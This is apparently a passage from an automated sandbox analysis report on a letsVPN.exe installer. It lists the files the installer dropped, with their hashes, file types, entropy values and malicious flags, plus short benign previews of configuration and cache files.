                                                                                                                                                                                                  SSDEEP:12288:HIFYX//kUg+kmWh0rHN9RSJYFAZU0L5Aflov/PfT:HIFQ//kvhkS56ev/PfT
                                                                                                                                                                                                  MD5:C2071F3E0F4D465E4A109BA7549D5619
                                                                                                                                                                                                  SHA1:0ACDE6A36599862CAEADE3E15AD6644D15520547
                                                                                                                                                                                                  SHA-256:9941DE185F7AB38CE773D41DC444FC886F8EB135A1BE5EB255DC0956DA7D1AEF
                                                                                                                                                                                                  SHA-512:D17116206B49A2D255BEB052D06997E149C5537B6DAB6654D6814325A4D20EA19EA7FC37308139FF719E22E81D75646C91523485A37BCABB8B00DD74C5DC2639
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2482688
                                                                                                                                                                                                  Entropy (8bit):6.599322698372088
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:HymviY7ZdM+3023FbNifZoGlBP3+IoA7YRAt+RB48UOexIFQHkaS5Jv/PfT:HziCdt3023FbNifZ1D3+IoEt+RS8UOel
                                                                                                                                                                                                  MD5:72ADFBFC97B1F1E7ABA3F63CD264C0B2
                                                                                                                                                                                                  SHA1:93DFEBD64B0FC0AA932E23A5D4E6A32CEBE7CF32
                                                                                                                                                                                                  SHA-256:77762C479E46D1DF205EB020D4C1AF5CCD8E433111DC63BE53B2401C7B8257AC
                                                                                                                                                                                                  SHA-512:7AF6E43B7C6086646D1CAC37234658722ABDF466689AB58459468095722E66DB0ED008DA5B2F731D8FB28F60F52EA1FD0C3501C47A79678EB1F6392AF61CB004
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):455328
                                                                                                                                                                                                  Entropy (8bit):6.698367093574994
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
                                                                                                                                                                                                  MD5:FD5CABBE52272BD76007B68186EBAF00
                                                                                                                                                                                                  SHA1:EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
                                                                                                                                                                                                  SHA-256:87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
                                                                                                                                                                                                  SHA-512:1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):970912
                                                                                                                                                                                                  Entropy (8bit):6.9649735952029515
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                                                                                  MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                                                                                  SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                                                                                  SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                                                                                  SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1241344
                                                                                                                                                                                                  Entropy (8bit):6.551959555603401
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:mVaymviYNqEZ3tt++3jyQoH0y23FbNKMipvFaSvAVrolBPZF+vIk7Am47NRkRm7l:HymviY7ZdM+3023FbNifZoGlBP3+IoAn
                                                                                                                                                                                                  MD5:66F67DA104FCAB66D963C47AEAD51677
                                                                                                                                                                                                  SHA1:5C20E591F057607EDABB939234073B7C1E1B0776
                                                                                                                                                                                                  SHA-256:6A3ADB6F15F0790EEAF07BDEBACDC8C3A7766B0CD0F9EAC0001338DA98C3DB18
                                                                                                                                                                                                  SHA-512:321E1E6F8FFE3EFA94BB3A41EF317F0525289DB1397D03FD68115F963AD74234A01459EC2143D9529B09D2C0414771B7E57715109CFF72EEF6049B97F70D3DE3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):258328
                                                                                                                                                                                                  Entropy (8bit):6.64001582449504
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:/BstfXX0BcNv96T+CZxJK30D62E9NTBqCmN1BIKXXuo:pI0Bc/Y5K3m62E9NTsCmNg2V
                                                                                                                                                                                                  MD5:68411B35F7B40B45AFC4A60A2681549D
                                                                                                                                                                                                  SHA1:98377319160E6DA97FD6E5D97AFE2441E0FE21A6
                                                                                                                                                                                                  SHA-256:5C3A73321F59CDC28164D79E8B60ECC57A90FF398A2CDBDE2BB718C8E9500D23
                                                                                                                                                                                                  SHA-512:CC509C4F41F86C9191BF5FBB826A362FFEF2BC78046B99356F944F39A17ED1AB17A6286FFE6AD03C290F6BBCE492F0DE96954B4C1075B27771C491C2CA027156
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                  Entropy (8bit):0.7263370043626358
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0D:9JZj5MiKNnNhoxuK
                                                                                                                                                                                                  MD5:BEA639A12A1ACE8280B8711C5D1674E1
                                                                                                                                                                                                  SHA1:14EE8E112285E4679BA4CBBE21A8181B110D2C75
                                                                                                                                                                                                  SHA-256:7C5ED079C306EC8D5023272F875E50318469B2FD33D5FE63FDFBBDC365BBD142
                                                                                                                                                                                                  SHA-512:73434C7352088B898DB18DD71C03F56C327E61DA0CAD197E743269CBE99F3F36AF36A09BF804B93B77D30EE83050AD8B08F71AA83F5718F7D16650DC9CB326F4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:Extensible storage user DataBase, version 0x620, checksum 0xad3dd8e6, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                  Entropy (8bit):0.7556167819364832
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:VSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:VazaSvGJzYj2UlmOlOL
                                                                                                                                                                                                  MD5:FCCC047E06A99A3100A5337286C05F7F
                                                                                                                                                                                                  SHA1:B9CBE4227C0521E06E9CBA34FB1C79D6AFD10338
                                                                                                                                                                                                  SHA-256:4AC9F139328AC0E5238177AC63196945281512CD923B87F24E39599086D62A1C
                                                                                                                                                                                                  SHA-512:E42F079FBA57B1E7AF2AAA01BC364AD72F6E2A45813E44F348F2B528A304FB3EE17ADE5063BDF8369DA9A2DF9CF53B1A316D2EA63E42F97E943ED163BE76764F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                  Entropy (8bit):0.08008519067864
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:bll/KYeH+QcfNaAPaU1larQaalluxmO+l/SNxOf:bltKzH2NDPaUCr0gmOH
                                                                                                                                                                                                  MD5:C260CC4B5F31AC6CB28A7C81634D10B1
                                                                                                                                                                                                  SHA1:84A2E33DDA582B035452680075FCFD4637185698
                                                                                                                                                                                                  SHA-256:7BEB77F66A2FBB725DB1E0536A754C88FF69F0462A94B30B1DBB2016B5A207DD
                                                                                                                                                                                                  SHA-512:8EDC7D2B423A2A74CC76ABA928789464EB801FD5A5BA17F948AC29351CEB996051A8C2619FD25CEBFF58534C172F98EC83C7B62D37261FC3B2A7F82F4598F8AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15448957
                                                                                                                                                                                                  Entropy (8bit):7.999985585470918
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:393216:BwoVsxGxbiDDzWzmJ/2inHWazagVdtBrx8wXpZVYcs7:WoWG0DDzWCgin/tB97Yx
                                                                                                                                                                                                  MD5:31F107A675EF31F01B6BD9A235A0312A
                                                                                                                                                                                                  SHA1:885CAB479BF5BB49BC8B756A4D9C4BC4C1617D49
                                                                                                                                                                                                  SHA-256:B9C959D49CCD893BEAA22987475A094D573D00C4A609E534B4D55E0B3D956DBD
                                                                                                                                                                                                  SHA-512:96D28B3D1284146032B1F55BA39AA4D92CD83CA440146CD9E7F564D0D804B72C9390D78894ACAC279324C918607C1F8CFDEEE58F3FF34A20A40447A55F63B01A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15511576
                                                                                                                                                                                                  Entropy (8bit):7.998943488854436
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:393216:opzmzGnkfV8tfGWcSWNKQ/kg/bZzvtMA63NiSAO:ohmSkOtfGWcSWJZzlAi+
                                                                                                                                                                                                  MD5:9F5F358AA1A85D222AD967F4538BC753
                                                                                                                                                                                                  SHA1:567404FAEC3641F4DF889C2C92164CEE92723741
                                                                                                                                                                                                  SHA-256:EB11627E59757105BDDB884540854D56B173FE42417878DE4E7D246CAC92C932
                                                                                                                                                                                                  SHA-512:D5A4C4B343704B96C98183D13D90E37065C8BE0D0ED053696FB28B5E29F1432175D5E9F63C2D2879C3EB3541E4822A64AE7BFA2230C0C00B5C3ADA0A1AC82BED
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3046001, writer version 2, read version 2, file counter 7, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                  Entropy (8bit):0.6921140210664358
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:Th49h4iAtmGqPRarI7JjwrxOGmwrnfXKKfgsy/rI7JjwrxOGzmxNNoG/Xgsy/rIr:IqIdjoOofwIdjogAIddJb2id
                                                                                                                                                                                                  MD5:4A639C6E907F0C38EED44EFBA636FCD8
                                                                                                                                                                                                  SHA1:3C72EB257AB1BEDBA25A0417142D7C50B6BE5BB7
                                                                                                                                                                                                  SHA-256:F35C01500A0A76E2D574301CA3371FF7D533A1C8B58591DD82B5ABBB64099FAC
                                                                                                                                                                                                  SHA-512:CEF84F292F0EFDA27EA723B1474B3C5AC1C60D4120C7B6FA7282BF44C459AB7F2C872298A1B2EDD694F409B402DEF9C3EDBEB3E811A4EA173D56DE9D399358B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4616
                                                                                                                                                                                                  Entropy (8bit):3.777214372103078
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:7M8qA9h4iAtmGqPRarI7JjwrxOGmwrnfXKKfgsy/rI7JjwrxOGzmxNNoG/Xgsy/9:79tqIdjoOofwIdjogAIddJb2idq
                                                                                                                                                                                                  MD5:D8498D38FC91360CD058612859F06A5C
                                                                                                                                                                                                  SHA1:3FF5EBF6172D25E4C36C9B0AA7E506132BF1A495
                                                                                                                                                                                                  SHA-256:F246664D162A8E6AAF8DFEA7996B4972F53F123CA8B8DBE65B3EF9CD1F4E87F8
                                                                                                                                                                                                  SHA-512:E87B361F12B16F42F3BC37C451FB33E4C448BDA2F08567C2DCADC50475FC6C4240EC4DFB9B51C4ADE4F35BC40B97AE652295308666389B5CC46A96925393A6A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                  Entropy (8bit):0.05277169061399585
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:GWARSfHRARSfHXP9Xml/Xml/wUUocBYr:mRSfHmRSfH1Sa4j
                                                                                                                                                                                                  MD5:3CBC83FF025FC00F5FA62DA8C24C49EC
                                                                                                                                                                                                  SHA1:87B108B937D2D0E86DBEC0A19D844507C4498485
                                                                                                                                                                                                  SHA-256:9C328AFB651A3B13ED7E0640A5618B7909C2D7FBC683520D952C7F6194328235
                                                                                                                                                                                                  SHA-512:D5692F7E3ACD59D4E6E36A09268DE555B83A7C9A01C06BBABDB2214B13E1D9ADB96ACF6C88AFB97FD7D80EE194454F0302CF0050CD4EA1416DF83F91949F0BCD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):82432
                                                                                                                                                                                                  Entropy (8bit):0.25395212676931506
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:rvTtBv70uhyKSpwSUrwDJPNr8CWyU/5DUkrKRH59:WXZ
                                                                                                                                                                                                  MD5:DCF30BBB257B5E04E76337708C4AF545
                                                                                                                                                                                                  SHA1:200C778F236F8351F57CB12E500D39C94DC8B435
                                                                                                                                                                                                  SHA-256:3C189B79E6DDCCDE9E5376AE5FCED2332995AD77C6C5AD41EC84949589F0F5D9
                                                                                                                                                                                                  SHA-512:F02EF06FEA54546381B2063114C9F2148C5444C7FB1D12E85DDCC4C98F0F64501D30FA180C6621799A19050CCDB9BC9EB5D133DE39F82B4DC5F8C40254419CCB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):199
                                                                                                                                                                                                  Entropy (8bit):5.048749037023789
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:vFWWMNHU8LdgCQcIMOofqRqLVuXKCWAa8LDMBlTqqdDVEoFyPvWAGF9ULVuuQIMO:TMVBd1IGpOSAMBluqdJZnASG3QIT
                                                                                                                                                                                                  MD5:46334F032941DEA780C154F419B4D291
                                                                                                                                                                                                  SHA1:371D375CB0A1F1C732128B911C949B499DA276DF
                                                                                                                                                                                                  SHA-256:5F0EEDAB8A0DF8ED90EBBA202D74A9AAF8CBDB6BEBD2564A64F14388271BBB21
                                                                                                                                                                                                  SHA-512:BC20CA45990E13BFE9C6FD966CA0972FFB5047CEC1726662BDB1196DE166E6898BE7B5F5F8EF586C8578BAFE0217196C33D44269CBE04F7B1DD163849846C51B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <appSettings>.. <add key="AppCenterInstallId" value="8f0adaa2-06ae-4649-a9f3-7ef3459ee383" />.. </appSettings>..</configuration>
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):199
                                                                                                                                                                                                  Entropy (8bit):5.048749037023789
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:vFWWMNHU8LdgCQcIMOofqRqLVuXKCWAa8LDMBlTqqdDVEoFyPvWAGF9ULVuuQIMO:TMVBd1IGpOSAMBluqdJZnASG3QIT
                                                                                                                                                                                                  MD5:46334F032941DEA780C154F419B4D291
                                                                                                                                                                                                  SHA1:371D375CB0A1F1C732128B911C949B499DA276DF
                                                                                                                                                                                                  SHA-256:5F0EEDAB8A0DF8ED90EBBA202D74A9AAF8CBDB6BEBD2564A64F14388271BBB21
                                                                                                                                                                                                  SHA-512:BC20CA45990E13BFE9C6FD966CA0972FFB5047CEC1726662BDB1196DE166E6898BE7B5F5F8EF586C8578BAFE0217196C33D44269CBE04F7B1DD163849846C51B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <appSettings>.. <add key="AppCenterInstallId" value="8f0adaa2-06ae-4649-a9f3-7ef3459ee383" />.. </appSettings>..</configuration>
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3031001, file counter 7, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                  Entropy (8bit):2.0300234406717377
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:KhKJxJjwCXep99Jo4xJGCXep9EbCXep9atVCXep9L:ayjwCO97pGCO9EbCO9uVCO9L
                                                                                                                                                                                                  MD5:EDD3621621D495DF574DF22F984F937F
                                                                                                                                                                                                  SHA1:E996EBA7E3A5BCEA4CB1557B75ECC8472F284F34
                                                                                                                                                                                                  SHA-256:1D7F13DE985C31981DC31118D34B0E9DE690F9E7F5762005427398ADC5E21CDD
                                                                                                                                                                                                  SHA-512:347E640D6937DA7FF8B13C16DA1614A6D80CC573E8811903935C0826EC8CDC7345DDD2D792532C0F42A8B1CE0CE918F60344B29628E48D6C085DCD6978BB5314
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8720
                                                                                                                                                                                                  Entropy (8bit):2.6913396546243114
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:7eRJxJjwCXep9XJo4xJGCXep9TbCXep9atVCXep9+Qm:7erjwCO9ZpGCO9TbCO9uVCO9+f
                                                                                                                                                                                                  MD5:2D96B4DD54EC3FFDF21A3D6F6A71C369
                                                                                                                                                                                                  SHA1:F5C474B4FDBC1D8340DEAD91DAFF150A9278AE66
                                                                                                                                                                                                  SHA-256:2CF5C09E00138A378F61FE0567E9BFC3C62EEE86A88B10A5FF05D3986674A260
                                                                                                                                                                                                  SHA-512:A2A4373C12FC7456FF212C33EE26ABE5735FC864636D835568F51760D2BE5F32B7EC1D8FAB20741310A9977EB2639B1BFE3CA9DF77C62CC7AF2144E95B05282F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2424
                                                                                                                                                                                                  Entropy (8bit):5.348163999675204
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeYHKU57UjHKtHKMRtHj:iqlYqh3ou0aymsqwtI6eqzVqU57Ujqtp
                                                                                                                                                                                                  MD5:1D015055F59E3C59A292A836E94902DB
                                                                                                                                                                                                  SHA1:6606627C577A8D9FBB362C0FFFD5E500295CA4AC
                                                                                                                                                                                                  SHA-256:D72DA6BAE429BF4A293DF3A8B637CC821491A9585DEA47553D6753A50D6EE519
                                                                                                                                                                                                  SHA-512:C2484FDCB22662B80659A9BD978CB1995D1C7912E6E24AABCF917862DB74F900B4775A24EE922B7A9B41CA48B5EF82C2E13C951D2CAD716B86FA11E1687C2EFA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):34383
                                                                                                                                                                                                  Entropy (8bit):5.053402703870376
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:QPV3IpNBQkj2Ph4iUxsfrRJv5FqvXhARlardFRgrOdBPtAHkDNZbNKeCMiYo6:QPV3CNBQkj2Ph4iUxsflJnqv6qdPgrOf
                                                                                                                                                                                                  MD5:D63CB5E171D7FCFE28C9E904F6855F08
                                                                                                                                                                                                  SHA1:8C6B004EC20FF61EF4CA9EAFA6F0254364A960AB
                                                                                                                                                                                                  SHA-256:F081E30CF5BB68206C7A59B83BC914B9BD2ED59FBEE26843075D2D0CD7393354
                                                                                                                                                                                                  SHA-512:E9F534C0087182A51D5BE60E14FA992B2B933F444D32C2A2DBA3C7D4FCD6A1F418CF7A6A8B37165A61ED4D5B096716308035E117199A5B94FA796B58C041DB74
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:PSMODULECACHE.......CB.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........{HB.z..S...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam\NetSwitchTeam.psd1........Get-NetSwitchTeam........Add-NetSwitchTeamMember........Get-NetSwitchTeamMember........Remove-NetSwitchTeamMember........New-NetSwitchTeam........Rename-NetSwitchTeam........Remove-NetSwitchTeam..........zB.z..E...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetQos\NetQos.psd1........Get-NetQosPolicy........Remove-Ne
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2240
                                                                                                                                                                                                  Entropy (8bit):5.380472137169455
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:bylWSU4y4RQmFoUeWmfgZ9tK8NPP8m7u1iMugeC/ZPUyuE:bGLHyIFKL3IZ2KHVOug8E
                                                                                                                                                                                                  MD5:BDF39CB70643FEC01707DC4FAE488364
                                                                                                                                                                                                  SHA1:32CE3D929591CE726AD0FAABE6B9FBDF82B742DB
                                                                                                                                                                                                  SHA-256:DC65AC6CC31ACC5EC98AF9DB8B8ECFA69E1EFA7ADD069736D51A17EE45B53F5E
                                                                                                                                                                                                  SHA-512:813DE29F3BF9CF953415C94070A6F4220BE8F3828AC0E442B10AEDFF86F8A3F20FD60F31B0C246BCA9D33E6483EE4468CAE23A3872D361479DBCF1A943E3D8CF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
